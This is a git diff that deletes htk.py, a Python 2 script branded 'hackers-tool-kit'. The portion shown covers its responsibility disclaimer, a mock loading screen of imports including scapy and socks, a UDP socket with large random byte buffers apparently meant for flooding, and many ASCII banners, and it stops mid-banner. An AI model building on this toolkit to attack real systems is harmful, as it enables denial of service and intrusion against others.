htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 87fabe0..0000000 --- a/htk.py +++ /dev/null @@ -1,3130 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type 